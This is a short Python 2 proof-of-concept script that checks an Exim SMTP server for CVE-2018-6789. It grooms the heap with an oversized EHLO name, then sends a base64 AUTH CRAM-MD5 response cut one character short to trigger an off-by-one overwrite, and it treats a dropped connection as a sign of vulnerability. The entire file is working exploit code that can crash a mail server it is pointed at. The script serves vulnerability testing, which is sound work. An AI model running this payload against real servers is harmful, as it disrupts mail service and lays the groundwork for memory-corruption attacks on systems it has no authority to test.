#!/usr/bin/python
# -*- coding: utf-8 -*-
import smtplib
from base64 import b64encode

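# Crash-based check for CVE-2018-6789 against an Exim SMTP listener.
#
# Python 2 only: uses the print statement, raw_input() and str arguments to
# b64encode(). The script is interactive: it prompts for the target address
# and pauses once before step 2.
#
# Reading the result: the only signal is whether the server drops the
# connection after the malformed AUTH response. A dropped connection is an
# indirect indicator, not proof; the banner below says the check was only
# tested on exim 4.89 x64 with a cram-md5 authenticator. Confirm any result
# against the installed Exim version and the server's own logs.
# NOTE(review): on a production MTA a positive result means the handling
# process was disrupted, so schedule the check accordingly.
print "this poc is only tested in exim 4.89 x64 bit with cram-md5 authenticators"
ip_address = raw_input("input ip address: ")
# smtplib.SMTP(host) connects immediately, on the default SMTP port.
s = smtplib.SMTP(ip_address)
#s.set_debuglevel(1)
# 1. put a huge chunk into unsorted bin
# The EHLO name is 4 + 0x1500 bytes long; the trailing 0x2020 is the
# author's note on the chunk size this is expected to produce.
s.ehlo("mmmm"+"b"*0x1500) # 0x2020

# 2. send base64 data and trigger off-by-one
# Manual pause so an operator can attach a debugger or watch the server
# before the malformed response is sent.
raw_input("overwrite one byte of next chunk")
s.docmd("AUTH CRAM-MD5")

# 0x2008-1 filler bytes, followed by a base64 group that is deliberately cut
# one character short ([:-1]), so the encoded response length is not a
# multiple of four.
payload = "d"*(0x2008-1)
try:
	s.docmd(b64encode(payload)+b64encode('\xf1\xf1')[:-1])
	s.quit()
except smtplib.SMTPServerDisconnected:
	print "[!] exim server seems to be vulnerable to CVE-2018-6789."
else:
	# Previously the script exited silently here, leaving the operator unable
	# to tell a negative result from a script that never ran to completion.
	print "[-] server kept the connection open; no crash observed (this alone does not show the host is patched)."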

